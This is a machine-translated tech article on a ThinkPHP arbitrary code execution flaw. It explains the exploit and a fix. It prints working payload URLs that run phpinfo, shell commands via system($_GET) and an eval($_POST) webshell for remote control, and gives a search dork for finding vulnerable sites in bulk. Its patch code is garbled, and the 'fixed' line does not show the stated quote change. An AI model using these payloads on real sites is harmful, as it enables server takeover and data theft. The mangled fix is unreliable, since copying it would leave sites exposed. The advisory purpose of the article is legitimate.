Shulou(Shulou.com)06/03 Report--

This article mainly explains "how to exploit and repair arbitrary code execution vulnerabilities in the ThinkPHP framework". The content in the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "how to exploit and repair arbitrary code execution vulnerabilities in the ThinkPHP framework".

Recently, an arbitrary code execution vulnerability has been exposed in the thinkphp framework, which is very dangerous. The exploit methods are as follows:

Index.php/module/aciton/param1/$ {@ print (THINK_VERSION)} index.php/module/aciton/param1/$ {@ function_all ()}

Where function_all represents any function, such as:

Index.php/module/aciton/param1/$ {@ phpinfo ()}

You can get the system configuration information of the server and so on.

Index.php/module/action/param1/ {${system ($_ GET ['x'])}}? x=ls-al

You can list a list of website files

Index.php/module/action/param1/ {${eval ($_ posts [s])}}

You can directly execute the one-sentence code and connect it directly with a kitchen knife.

In this way, hackers can directly use google batch search keyword: thinkphp intitle: system error to get a more list of websites using the thinkphp framework. It can be seen that its harmfulness is quite great.

The thinkphp framework performs arbitrary code vulnerability fixes:

Users can download the officially released patch:

Http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

Or modify the source code directly:

In the / ThinkPHP/Lib/Core/Dispatcher.class.php file

$res = preg_replace ('@ (w +)'. $depr.' ([^'. $depr.'\ /] +) @ eBay,'$var. [\\ 1\'] = "\\ 2";', implode ($depr,$paths))

Modified to:

$res = preg_replace ('@ (w +)'. $depr.' ([^'. $depr.'\ /] +) @ eBay,'$var. [\\ 1\'] = "\\ 2 implode ($depr,$paths))

Change the double quotation marks in the second parameter of preg_replace to single quotation marks to prevent the php variable syntax from being parsed.

Thank you for your reading, the above is the content of "how to exploit and fix arbitrary code execution vulnerabilities in the ThinkPHP framework". After the study of this article, I believe you have a deeper understanding of how to exploit and repair arbitrary code execution vulnerabilities in the ThinkPHP framework. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.